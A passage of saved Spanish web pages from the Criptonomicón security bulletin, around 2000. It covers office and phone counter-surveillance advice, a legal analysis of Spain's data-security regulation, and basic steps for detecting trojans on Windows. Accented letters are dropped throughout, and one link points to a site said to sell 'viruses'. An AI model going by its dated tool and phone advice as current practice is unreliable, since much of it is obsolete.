disciplinarios, expedientes de regulacin de empleo o huelgas, un piquete
informativo en poder de dicha informacin puede ser una autntica pesadilla.
Esta disponibilidad incontrolada de informacin personal por parte de
terceros es especialmente peligrosa cuando versa sobre aspectos ms
ntimos.
Las notas anteriores pretenden ser nicamente una llamada de atencin
sobre los riesgos que supone la falta de control sobre la informacin y
destruir la idea preconcebida de que slo determinada informacin es
importante.
Ningn sistema de seguridad puede garantizar un cien por cien de eficacia,
ni tampoco se puede llevar la seguridad hasta extremos de paranoia que
imposibiliten el normal funcionamiento de la empresa.
Pero s es posible establecer unas normas mnimas de seguridad en el
tratamiento de la informacin. El objetivo es limitar las fugas incontroladas y
permitir la deteccin de stas en caso de que se produzcan, a travs de una
serie de precauciones.
El presente estudio no es un plan de seguridad corporativa, sino
simplemente un documento que, a travs de sus pginas, pretende llamar la
atencin sobre este fenmeno y ofrecer una serie de pautas de
comportamiento que corrijan graves deficiencias existentes, de forma
generalizada, en la operativa diaria de la mayora de los directivos.
Recuerde, no obstante, que ningn plan de seguridad es infalible. Una
cerradura se puede forzar, una clave descifrar y un telfono siempre se
podr pinchar. Si verifica que no hay dispositivos de escucha en una sala
eso slo significa que en ese momento y lugar no los hay, pero no que no los
haya habido ni que no los haya maana. Si descubre un equipo espa, slo
sabr que le han espiado, pero no desde cundo.
La virtud de todas las medidas que se expondrn en este documento no es
hacer imposible las intromisiones. Su virtud es que las hace francamente
difciles y, si tenemos suerte, ms difciles que respecto de firmas
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (4 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

competidoras. Sea consciente, no obstante, de este lmite.


2.- Lugar de trabajo
El centro en el cual confluye ms de 90% de la informacin que manejamos
es nuestro propio lugar de trabajo y, por ello, merece ocuparse de l en
primer lugar.
Las principales normas a tener presente en este apartado son las siguientes:
- - La sala debe reunir unos requisitos mnimos de aislamiento acstico que
impidan la escucha desde el exterior de conversaciones mantenidas en el
interior. Esto incluye acristalamiento doble y paneles o paredes aisladas. En
caso de que la sala linde con finca vecina, debe preverse una cmara de
aire entre el panel interior y la pared. El panel interior debe tener aislante
acstico y ser practicable para la inspeccin de la cmara. Debe disponer de
cortinas y cerradura interior de las ventanas, en el caso de que stas sean
practicables.
- - Asegrese, a travs de personal de mantenimiento, de que no hay
cableado intil en paredes y falso techo. Puede ser fcilmente utilizado como
portador de seal. En caso de instalaciones de reserva (habitual en
modernas instalaciones de redes de voz y de datos), verifique que los
conductos de canalizacin son seguros .
- - Tenga siempre cerradas las cortinas.
- - No utilice ni interfonos ni telfonos inalmbricos y, en caso de que el uso
de los mismos sea imprescindible, adquiralos de tecnologa digital de
transmisin.
- - Disponga de cerraduras seguras en todas las puertas, armarios y cajones.
Si maneja documentos especialmente sensibles, adquiera una caja de
seguridad para almacenar los mismos. Dichas llaves debern estar en su
poder y, en caso necesario, en el de su secretaria o colaborador de
confianza. En previsin de emergencias, entregue una copia al responsable
de seguridad, dentro de un sobre de seguridad cerrado y con su firma en la
unin de la solapa con la bolsa, para su depsito en una caja de seguridad.
- - Slo deben tener acceso a nuestro despacho personas de la propia
organizacin. Las visitas de terceros es conveniente atenderlas en salas
especialmente previstas para ello. Adems, instruya al personal de limpieza
para que revise y adecue la sala inmediatamente despus de cada uso.
Dichas salas deben carecer de telfonos enlazados a lneas directas y, en la
medida que el sistema lo permita, slo deben poder realizar llamadas a
extensiones interiores (sin perjuicio de que puedan recibir, transferidas,
llamadas externas).
- - Autorice el acceso a su despacho, en su ausencia, a una nica persona
de confianza (p.e. su secretaria). En caso de que, en su ausencia, algn
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (5 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

colaborador precise de algn documento, sta ser la encargada de


entregarlo.
- - Al abandonar el despacho, no deje ningn documento accesible. Durante
su ausencia, personas sobre las cuales no tiene ningn control accedern al
mismo (personal de limpieza, mantenimiento, seguridad, etc.). No
presuponga ni la integridad ni la capacidad de estas personas, no todas
tendrn su inteligencia y formacin para discernir la bondad o maldad de una
determinada conducta. Una prctica til en este aspecto es disponer de un
estante en uno de sus armarios, exclusivamente para depositar en el mismo
los documentos existentes sobre su mesa en el momento de salir. Instruya a
su secretaria o colaborador de confianza a que, antes de salir y en caso de
ausencia de usted, revise que no queden papeles accesibles.
- - En su ausencia, los armarios y cajones debern quedar cerrados.
- - Disponga de destructora de documentacin, de prestaciones adecuadas
al volumen de los documentos que maneja. Escoja una que disponga de
entrada de objetos al depsito y elimine las papeleras, as estar seguro de
que cumple la norma de destruir todo papel desechado. Disponga lo mismo
para su secretaria.
- - Desconfe de los regalos. La forma ms fcil de introducir un micrfono
emisor en su oficina es introducindolo en un objeto de regalo. En todo caso,
verifique por personal especializado (a travs del responsable de seguridad)
su inocuidad. Bajo ningn concepto conecte a la red elctrica o telefnica
equipos que le hayan sido regalados (desconfe especialmente de un
telfono mvil, se pueden "trucar" de varias maneras).
- - En zonas de despachos panelables, no reciba visitas. Es muy fcil que
esa persona vea o escuche algo que no debe. Disponga de otro local, donde
se recibe, y no se pueda llevar, ms que lo que usted le quiera dar.
- - Instale una alarma, conectada a Central Receptora, con detectores de
humo (no olvide el riesgo del fuego), y mejor con cmara de TV, para que
desde la Central sepan lo que est pasando cuando se dispara la alarma.
3.- Proteja la informacin
Sea cauto en sus conversaciones con colegas en firmas competidoras.
Usted nunca podr valorar de forma segura hasta qu punto una informacin
puede o no ser valiosa para una empresa competidora. Conocer la
existencia de un proyecto descartado, aunque puede no parecerlo, tiene una
extraordinaria importancia: da una idea de la actividad de una empresa en
materia de innovacin, afianza la conclusin de que una idea es digna de
tenerla presente y estudiarla, permite prever posibles actuaciones futuras,
etc. Si, adems, comentamos por qu lo hemos descartado, la informacin
(y los beneficios de conocerla) se multiplican.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (6 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

Y todo sin que seamos conscientes de ello: la mayora de las veces, las
indiscreciones por nuestra parte no son ms que respuestas, aparentemente
intranscendentes, a indiscreciones ajenas.
Tengamos presente, adems, que comunicar determinados detalles o
informaciones es la mejor forma de crear confianza en nuestros
interlocutores. Dejar que terceros conozcan estos detalles les permite crear
la apariencia de una condicin que nunca hemos querido darles.
4.- Uso del telfono
La comodidad que representa el telfono hace que por el mismo circule la
mayor parte de la informacin que conocemos. No obstante, es un sistema
de comunicacin altamente vulnerable: se puede pinchar en todo el recorrido
de la lnea (tanto interna como externa), el emisor se puede alimentar de la
propia lnea y la escucha se puede realizar a distancia con total impunidad.
Obviamente, no puede usted prescindir del telfono, pero s tomar una serie
de precauciones que inutilicen en gran medida todo intento de intromisin.
- - Nunca utilice lneas directas al exterior. Aunque su extensin tenga
asignado un determinado nmero entrante, haga programar la centralita para
que la asignacin de lneas salientes sea aleatoria. De esta forma, para
acceder a sus comunicaciones desde el exterior ser preciso pinchar todos
los enlaces de la empresa.
- - En la medida de lo posible, haga instalar lneas RDSI, o similares de
transmisin de seal digital. Aunque existen equipos capaces de interceptar
dichas lneas, su disponibilidad es mucho menor que los de lneas
analgicas (pero el que disponga de tecnologa adecuada, podr hacerle
multitud de ataques, imposibles en las lneas analgicas)
- - Sea especialmente reservado cuando utilice telfonos mviles (incluidos
los GSM). Es el sistema ms vulnerable y que ofrece mayor impunidad. Evite
dar nombres o datos cuando hable por el mvil y limite su uso a casos de
estricta necesidad. No facilite su nmero mvil ms que a su secretaria de
confianza, responsable de seguridad y personal directivo: en caso de
necesidad, su secretaria puede transferirle directamente las llamadas
urgentes recibidas en su oficina. Active la ocultacin del nmero propio (slo
posible en GSM). Utilice un telfono o tarjeta independiente para asuntos
personales. Debe saber, adems, que el GSM, informa al sistema del lugar
geogrfico en que usted se encuentra, simplemente por el hecho de estar
conectado.
- - En momentos de especial sensibilidad de los asuntos que deba tratar,
adquiera para su telfono mvil una tarjeta pre-pago, adquirida en efectivo.
Posteriormente, desviamos nuestro nmero habitual al nuevo, y la gente que
nos llame, no tendr que saber el nmero donde se ha desviado. La tarjeta
es el nico identificador del equipo y, sin poderla vincular a travs de pagos

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (7 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

por domiciliacin bancaria o tarjeta de crdito, difcilmente ser conocida por


terceros.
5.- Seguridad informtica
En nuestros ordenadores se concentra la prctica totalidad de la informacin
que elaboramos. Adems, hoy en da es un medio habitual de comunicacin.
La utilidad del ordenador para almacenar y procesar informacin tiene, como
contrapartida, la concentracin de la misma en un nico archivo de escaso
tamao. Antao, para apropiarse de los secretos de otro haba que examinar
y sustraer un considerable volumen de documentacin. Hoy basta con
apropiarse de un objeto que cabe en el bolsillo.
- - Utilice un programa de control de acceso y cifrado automtico de datos
sensibles (SAFE Data BECKER o similares). Los controles por contrasea
de los sistemas operativos al uso no cumplen de forma eficaz con esta
misin y son altamente vulnerables. Adems, no protegen la informacin
frente ataques directos al soporte fsico de la misma (generalmente, el disco
duro) . Con los porttiles, esto es imprescindible, por lo fcilmente que se
pueden "distraer" en cualquier desplazamiento. El cifrado es especialmente
importante cuando se trabaja en red, ya que determinados programas,
permiten ver todos sus archivos, desde cualquier otro PC conectado a la red
(Estos programas estn en las revistas especializadas y en Internet,
gratuitamente) . O para el caso del correo electrnico, que es muy
vulnerable.
- - Utilice contraseas seguras. Palabras, nombres, fechas o secuencias de
nmeros son fcil y rpidamente comprobadas a la velocidad actual de
proceso de los equipos. Una contrasea mnimamente segura se compone
de un mnimo de 8 caracteres mezclando maysculas, minsculas, nmeros
y signos especiales. Y por descontado, crelas usted, no el Dept. de
Informtica
- - Realice siempre copias de seguridad. Si le roban el equipo, o sufre alguna
avera, podr recuperar su trabajo. Almacnelas, eso s, en lugar
suficientemente seguro.
- - Active utilidades de cifrado en sus mensajes de correo electrnico
(recomiendo el PGP, de uso muy extendido) incluso dentro de la propia red
corporativa. Todos los sistemas de correo (internos o externos) estn
basados en el almacenamiento de los mensajes en un equipo servidor y un
operador con autorizacin suficiente (por clave propia o mediante clave
ajena conocida) a los que se podra acceder a los buzones de mensajes sin
que usted ni el destinatario lo supieran. No presuponga que el departamento
de informtica es seguro: probablemente lo es, pero usted no puede saberlo
(de todas maneras, piense que el correo electrnico se comporta all por
donde va pasando como un sobre transparente y si alguien quiere, lo puede
leer). Utilice direcciones de correo electrnico annimas, gratuitas y de un

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (8 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

solo uso, para los documentos delicados (el servidor de correo de la


empresa, para el Dpto. de Informtica, es transparente).
6.- Seguridad Corporativa
Todas las normas anteriores sern ineficaces si no son observadas por los
miembros de su equipo de trabajo y por el resto de los directivos. Instryales
sobre la importancia de la seguridad y control en el tratamiento de la
informacin. Distribuya copias de este documento. Mal se pueden tomar
medidas de seguridad, cuando se ignora su lgica.
Realice peridicamente "limpiezas", pero especialmente en pocas de crisis.
Los "malos" no quieren ser descubiertos, y por lo tanto, es posible que no lo
intenten, si saben que se hacen revisiones.
Valore la oportunidad de elaborar una poltica global de seguridad por
profesionales expertos. Esto permitir identificar zonas sensibles, redefinir
circuitos y, en resumen, establecer unas normas comunes adaptadas al
grado de inters que la informacin de una empresa pueda despertar en
terceros.
La seguridad es un aspecto vital para toda empresa (y muy rentable).
Lamentablemente, su utilidad slo se puede valorar cuando no existe y algo
ocurre.
Es imprescindible que alguien asuma las funciones de coordinacin de
seguridad. Slo as se puede permitir que hechos aislados lleguen a un
mismo centro de anlisis y toma de decisiones.
Audtese a s mismo y a sus colaboradores respecto del cumplimiento de las
normas. Realice regularmente reuniones de coordinacin y motivacin. No
es conveniente que cite al culpable, pero comente los errores detectados: es
la mejor forma de que todos puedan comparar lo ocurrido con su propio
comportamiento y corrijan actitudes potencialmente peligrosas
Antes de descartar una determinada prctica por la incomodidad que
representa, valore los riesgos que est asumiendo. Nunca podr valorar de
forma efectiva el nivel de seguridad de su sistema. En el mejor de los casos,
lo nico que podr saber es que es insuficiente... pero entonces ya ser
tarde. Por ello, no permita que su equipo se relaje por la ausencia de
incidencias: puede que no las haya habido precisamente por las medidas
seguidas hasta ese momento.
Mantngase siempre al da: las fugas de informacin son como los ratones.
Si no los ves no significa que no los haya. Si los ves, es que hay cientos de
ellos.
BIBLIOGRAFA
La ausencia de textos de alguna calidad es la norma. Para aquellos

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (9 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

interesados en el tema recomiendo la lectura de dos libros, que aunque no


tratan directamente las escuchas, dan una idea de conjunto sobre la
electrnica dedicada a la captacin de informacin:
"Historia de la Guerra Electrnica" e "Historia del Espionaje Electrnico", de
Mario de Arcangelis, ambas de la editorial San Martn.
Otro interesante: "Contra espionaje Econmico" de Enrique Gmez.
(934408329), da una visin de conjunto de sistemas en el mercado.
De Paladn Press (Box 1307-6CS, Boulder, CO 80306, USA) est el "the
Whole spy catalog" que es bastante completo, y el imprescindible "Don't Bug
Me" y "The Phone Book" de Edn Press ( Box 8410-AP, Fountain Valley, CA
92728, USA), una aproximacin bastante completa a las contramedidas.
"El delito Informatico", de Luis Camacho, merece la pena.
"Gua de Seguridad Informtica", de J.M. de Acua (Sedisi, 91 5774466)
quiz sea la obra mas completa.
Y libros no tcnicos, pero muy interesantes: sobre el impacto de las nuevas
tecnologas en la sociedad, y la necesidad de la Proteccin de la
Informacin, "Las guerras del futuro", de A Toffler, Editorial Plaza & Janes.
Una buena novela, documentada, que trata de la interceptacion sistemtica
de los Tf. mobiles y del E Mail, por los servicios de inteligencia es " El futuro
es nuestro", de Larry Collins, de Ed. Planeta.
Una revista mensual de "piratas" es "@rroba"
Publicado en el Boletn del Criptonomicn #58 y #59.
ngel Ripoll es detective privado, criminlogo y director de seguridad. Imparte clases
sobre la proteccin de la informacin en el ICADE, institutos de criminologa, en la
Autnoma, y en varias escuelas de Seguridad Pblica. Su trabajo est centrado en la
Proteccin de la Informacin, as como bsqueda e investigacin de escuchas, medidas
de seguridad fsicas, etc.

Informacin adicional

www.spyzone.com

www.loyola-edu/dept/politics/ecintel.html

www.spysite.com

www.mai-assoc.com

www.cb-security.com

E Mail annimo: www.mixmail.com, www.hotmail.com, etc.

www.hormiga.org, donde venden "virus", etc.

Artculos publicados

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (10 of 11) [25/10/2000 02:30:58 p.m.]

Proteccin integral de la informacin de la empresa

Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.


Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos58.html (11 of 11) [25/10/2000 02:30:58 p.m.]

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la empresa espaola?

Comercio electrnico

Criptologa y seguridad

Cuestiones legales

Intimidad y privacidad

Virus

Nuevo reglamento de seguridad para la proteccin de


ficheros automatizados con datos de carcter personal:
obstculo o ayuda al desarrollo de la empresa
espaola?
Por Fernando Ramos Surez

El artculo 18.4 de la Constitucin Espaola establece que "la Ley limitar el


uso de la informtica para garantizar el honor y la intimidad personal y
familiar de los ciudadanos y el pleno ejercicio de sus derechos".
Como consecuencia de este derecho fundamental y del artculo 9 de la
LORTAD (Ley Orgnica 5/92) relativo al necesario desarrollo reglamentario
de condiciones de seguridad que garanticen la confidencialidad e integridad
de los datos de carcter personal, surge una nueva medida de control para
garantizar el cumplimiento de estos preceptos. Nos estamos refiriendo al
Real Decreto 994/1999 de 11 de junio sobre medidas de ndole tcnico y
organizativo que deben cumplir las empresas para evitar la posible
alteracin, prdida, tratamiento o acceso no autorizado a los ficheros de
datos de carcter personal.
El objeto de estas medidas se encuentra en la necesidad de garantizar la
preservacin del derecho a la intimidad del ciudadano en la actual "sociedad
de la informacin", donde la tecnologa posibilita la copia, extraccin,
modificacin y transmisin de datos de forma sencilla y a bajo coste. Parece
que en el fondo de estas medidas est la preocupacin del legislador en
evitar que se produzca la transferencia de datos no autorizada a empresas o
a pases en donde no existe un nivel de proteccin equiparable al que
establece la LORTAD. Est claro que sera extremadamente fcil transmitir
estos datos y realizar con ellos cualquier tipo de tratamiento informtico no
controlado ni sancionado.
Para evitar este efecto, el nuevo reglamento establece una serie de medidas
de seguridad y sus correspondientes sanciones por incumplimiento de las
mismas, destinadas a garantizar la correcta custodia y manipulacin de los
ficheros afectados y evitar la posible fuga de datos (por ejemplo por personal
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (1 of 5) [25/10/2000 02:30:59 p.m.]

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la empresa espaola?

descontento de la empresa, o por la inexistencia de medidas de seguridad)


sin su correspondiente consentimiento a empresas o pases con menor nivel
de proteccin. Hasta aqu, parece loable y positivo el esfuerzo legislador
para corregir estos hipotticos problemas, que evidentemente pueden darse.
Pero este nuevo marco legal tiene una segunda lectura, no tan positiva y que
tiene que ver con la realidad empresarial espaola y los usos que en
trminos generales se hacen de los ficheros automatizados, pues para
muchos pequeos empresarios del sector (pequeos ficheros de clientes
utilizados para mailings) puede llegar a ser asfixiante, produciendo una clara
desventaja respecto de medianas y grandes empresas (que no tendrn
problemas en implantarlo) y promocionando retroceso de inversin en
marketing y publicidad directa.
Haremos en primer lugar un breve repaso del reglamento de seguridad y lo
que supone en trminos de su aplicacin y puesta en marcha.
Marco general de las medidas de seguridad
Las medidas de seguridad objeto de este reglamento se aplicarn a ficheros
automatizados de datos de carcter personal de los sectores pblicos y
privados (art. 2 de la LORTAD), distinguiendo tres niveles de seguridad (de
menos a ms seguridad) que deben aplicarse sobre cada fichero en funcin
del tipo de datos que contengan.
Nivel de seguridad bsico: todas las empresas que dispongan de
ficheros que contengan datos de carcter personal (nombre, direccin
postal, nmero de telfono) debern adoptar estas medidas.
Nivel de seguridad medio: ficheros que contengan datos relativos a la
comisin de infracciones administrativas o penales, Hacienda Pblica,
servicios financieros y ficheros de solvencia patrimonial y crdito.
Nivel de seguridad alto: ficheros que contengan datos personales de
ideologa, religin, creencias, origen racial, salud o vida sexual as
como los que contengan datos recabados para fines policiales sin
consentimiento de las personas afectadas.
Nivel de seguridad bsico
El plazo de implantacin de estas medidas es de seis meses desde la
entrada en vigor del reglamento, es decir, debern estar implantadas antes
del 28 de diciembre de 1999.
En el nivel bsico se establece la necesidad de elaborar e implantar por
parte del responsable del fichero un documento de seguridad que debe
contener: el mbito de aplicacin del mismo, las medidas, normas,
procedimientos, reglas y estndares encaminados a garantizar el nivel de
seguridad, las funciones y obligaciones del personal, la estructura de los
ficheros afectados y descripcin de los sistemas de informacin que los
tratan, el procedimiento de notificacin, gestin y respuesta ante posibles
incidencias y los procedimientos de copias de seguridad y de recuperacin
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (2 of 5) [25/10/2000 02:30:59 p.m.]

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la empresa espaola?

de datos.
Esto que parece sencillo para empresas de cierto tamao, puede no serlo
tanto para las pequeas empresas, autnomos y profesionales liberales.
Este colectivo supone ni ms ni menos que el 90% del tejido empresarial
espaol. La gran empresa confiar este asunto a su departamento de
asesora legal o subcontratar los servicios de una asesora externa, pero
qu ocurrir con el milln y medio de pequeas empresas? tendrn
capacidad para hacer cumplir la normativa o simplemente debern
abandonar la practica comn de realizar sus pequeos mailings peridicos
para sostener sus empresas?, se les juzgar con el mismo patrn que a las
empresas grandes?.
Nivel de seguridad medio
Adems del cumplimiento de las medidas de nivel bsico, el nivel de
seguridad medio, implica realizar una auditora (interna o externa) que
verifique el cumplimiento del reglamento, establecer un control de acceso
fsico a los locales donde se encuentran ubicados los sistemas de
informacin, y nombrar un responsable de seguridad, el cual coordinar y
controlar las medidas descritas en el documento de seguridad. Otra
obligacin propia de este nivel es la de establecer sistemas de identificacin
y autenticacin en relacin con el acceso a los sistemas informticos y el
establecimiento de un sistema de registro de entrada y salida de soportes
informticos.
A diferencia de las medidas de nivel bsico el plazo de implantacin de estas
medidas es de doce meses, es decir, debern estar implantadas antes del
26 de junio del 2000.
Nivel de seguridad alto
Debido a la naturaleza sensible de los datos personales propios de este nivel
se debern adoptar unas medidas de seguridad aparentemente mucho ms
restrictivas. Por ejemplo, las copias de seguridad deben custodiarse en un
lugar distinto al lugar de ubicacin de los soportes informticos y los
sistemas informticos deben registrar puntualmente todos los accesos. En
cuanto al transporte de la informacin se requerir una autorizacin firmada
del responsable de seguridad y se proceder a la encriptacin de los datos
para evitar que sean capturados durante el trasiego telemtico. Para una
correcta implantacin de estas medidas de nivel alto ser necesaria la
implantacin de una infraestructura de clave pblica en donde se garanticen
los principios de intimidad, autenticacin y confidencialidad. Siendo por tanto
crucial el desarrollo de las autoridades de certificacin o terceras partes de
confianza, y el de las Firmas digitales que influirn de forma positiva al
correcto desarrollo de estas medidas de seguridad.
Estas medidas de seguridad pueden ser para empresas como los,
sindicatos, partidos polticos o asociaciones de carcter religioso o sexual,
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (3 of 5) [25/10/2000 02:30:59 p.m.]

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la empresa espaola?

unas medidas restrictivas, pues difcilmente dispondrn de estructura tcnica


adecuada para conseguir cumplir el reglamento. Sin embargo, debido a la
naturaleza sensible de los datos ser necesaria la aplicacin del reglamento
para conseguir la eficacia jurdica pretendida. Adems el plazo de
implantacin de estas medidas de nivel alto es de veinticuatro meses, es
decir, suficiente tiempo como para poder ser implantadas antes del 26 de
junio del 2001. Mencin aparte mereceran las ONG, las cuales s
necesitaran de un apoyo y aplicacin flexible del reglamento por parte de la
Agencia de Proteccin de Datos.
Problemtica en la aplicacin del reglamento
Dentro del articulado del reglamento hay una serie de preceptos que a
nuestro juicio no estarn exentos de polmica en su aplicacin por parte de
la Agencia de Proteccin de Datos.
Nos referimos al art. 6 donde se establece que la ejecucin del tratamiento
de datos de carcter personal fuera de los locales de ubicacin del fichero,
deber ser autorizada por el responsable del fichero y lo que es ms
importante, deber garantizarse el nivel de seguridad correspondiente al tipo
de fichero tratado. Este artculo supone, para las empresas que presten
servicios de tratamiento de datos (art. 27 de la LORTAD) la exigencia de
garantizar las medidas de seguridad correspondientes al nivel del fichero de
la empresa cliente. Siendo por tanto muy importante garantizar en el contrato
de prestacin de servicios la responsabilidad en materia de seguridad, ya
que de lo contrario la sancin puede ascender a 50 millones, segn el
artculo 43.3 h) de la LORTAD.
Por otro lado el art. 4.4 del reglamento establece que se aplicarn medidas
propias del nivel medio cuando los ficheros contengan un conjunto de datos
de carcter personal suficientes para obtener una evaluacin de la
personalidad del individuo. En este caso se habrn de cumplir las medidas
de auditora, identificacin y autenticacin, control de acceso a los locales y
gestin de soportes propios del nivel medio pues esto podra constituir una
clara barrera para el desarrollo de la pequea y mediana empresa. Habr
que esperar a que la Agencia de Proteccin de Datos se pronuncie al
respecto, pues en el texto legal no se especfica que ha de entenderse por
"personalidad" o por "suficiente".
Conclusiones
La proliferacin de las redes de informacin y comunicaciones est
produciendo un gran impacto en el desarrollo econmico y en el comercio
mundial. La globalizacin hace que los datos personales sean cada da ms
vulnerables, siendo necesaria la aplicacin de medidas de seguridad y
procedimientos tcnicos y legales para la proteccin de los datos. Sin
embargo, no hay que olvidar que esta normativa podra obstaculizar el
desarrollo del comercio, de ah que sea necesario un justo equilibrio para no

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (4 of 5) [25/10/2000 02:30:59 p.m.]

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la empresa espaola?

crear barreras y al mismo tiempo evitar un tratamiento no autorizado de


datos de carcter personal. Se hace necesario por tanto, un esfuerzo de
todos los actores involucrados (empresas usuarias afectadas, proveedores
de servicios, listbrokers, administracin, etc.) para que este nuevo marco
legal se torne beneficioso para todos y produzca la deseada confianza en el
consumidor. As con el establecimiento de reglas claras y la tutela de los
derechos fundamentales se incrementar la confianza de los consumidores
en las nuevas tecnologas, convirtindose en una condicin para el
desarrollo del sector y en particular del comercio electrnico. De igual forma,
la aplicacin de estas reglas de seguridad es una oportunidad inmejorable
para que la empresa espaola se introduzca en el mbito de las nuevas
tecnologas y obtenga de esta forma la seguridad necesaria para operar en
el mbito de la nueva "sociedad de la informacin".
Publicado en el Boletn del Criptonomicn #57.
Fernando Ramos Surez es abogado especializado en Derecho Informtico, del
Departamento de Asesora Jurdica de ITEM (Informacin Tecnologa y Marketing
Consultores).

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (5 of 5) [25/10/2000 02:30:59 p.m.]

A la caza del troyano

Comercio electrnico

Criptologa y seguridad

A la caza del troyano

Cuestiones legales

Por Alfonso Lzaro Tllez y Julio Csar

Intimidad y privacidad

Internet ... Red de redes ..., donde podemos encontrar prcticamente

Virus

cualquier utilidad que queramos para nuestro ordenador. Pero hay que tener
un poco de cuidado, cualquier programa que descarguemos puede contener
un virus o un troyano.
Pero que es un troyano? Es sencillamente un programa que oculta dentro
otro programa potencialmente peligroso para nuestro ordenador y que, de no
ir disimulado en otro, probablemente nunca instalaramos en nuestro PC. Al
intentar ejecutar esa utilidad que tantas ganas tenamos de obtener y que
por fin hemos conseguido encontrar en Internet, no funciona correctamente (
esto es una generalidad pero no es as en el 100% de los casos ) y para
colmo hemos infectado nuestro ordenador.
Al igual que en la ciudad de Troya ... hemos metido al enemigo dentro de
nuestro ordenador, en un bello envoltorio, y dejado a este a merced de la
persona que escribi el troyano.
Los ltimos troyanos aparecidos permiten a terceras personas tomar el
control TOTAL de nuestro ordenador de forma remota, pueden escribir,
borrar, cambiar archivos, configuraciones ... etc., al igual que nosotros
mismos delante de nuestra pantalla.
En estos programas, a diferencia de los virus, su fin no es reproducirse. Por
tanto, la mayora de los scaners heursticos de los antivirus no detectan
estos programas como peligrosos a menos que hayan sido actualizados
convenientemente.
Bueno ... y qu puedo hacer para saber si el programa que acabo de
ejecutar es un troyano o no?. Daremos unas pequeas pautas generales
para intentar descubrir si oculta o no un troyano.
1. Comprobar la nueva aparicin de DLLs o EXEs en c:\windows o
c:\windows\system. Hay diversos mtodos. Uno de ellos es usar find con la
opcin de bsqueda por fecha de modificacin o creacin. Otra es usar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos56.html (1 of 3) [25/10/2000 02:30:59 p.m.]

A la caza del troyano

utilidades especficas como FileMon, un utilsimo programa gratuito que


podemos obtener de http://www.sysinternals.com/filemon.htm y que ayuda a
monitorizar cualquier cambio en el sistema de ficheros.
2. La nica manera de mantener el control de nuestra maquina por un
troyano es abriendo alguna conexin con nuestro ordenador , para ello
comprobaremos las conexiones abiertas con un netstat -an. Cualquier
conexin sospechosa debe ser analizada en profundidad.
3. Comprobaremos el Registry de Windows, desconfiando de nuevas
entradas que aparecen espontneamente al ejecutar cualquier programa.
Hay que tener especial cuidado con las claves que cuelguen de
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,

ya que suele ser el lugar escogido por la mayora de troyanos para instalar
una clave que apunte al fichero que quieren que se ejecute cada vez que se
reinicia Windows. En cualquier caso, tambin nos ser de gran ayuda la
utilidad gratuita RegMon, que ayuda a monitorizar cualquier cambio en el
Registry de Windows.
Por ltimo, no est de ms recordar que existen herramientas creadas
especialmente para la deteccin/eliminacin de troyanos. Aunque muchos
antivirus hoy en da detectan y eliminan muchos troyanos, la proteccin que
ofrecen no puede considerarse, en ningn caso, suficiente. Las herramientas
anti-troyanos especficas, aunque an tienen mucho que mejorar, son en
general muy superiores con respecto a los antivirus. Mencionaremos dos de
ellas: Jammer 1.7, que tiene una versin freeware y LockDown2000.
Publicado en el Boletn del Criptonomicn #56.
Alfonso Lzaro Tllez y Julio Csar son consultores de IP6Seguridad.

Informacin adicional

Cmo protegerse frente a virus

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos56.html (2 of 3) [25/10/2000 02:30:59 p.m.]

A la caza del troyano

Enviar

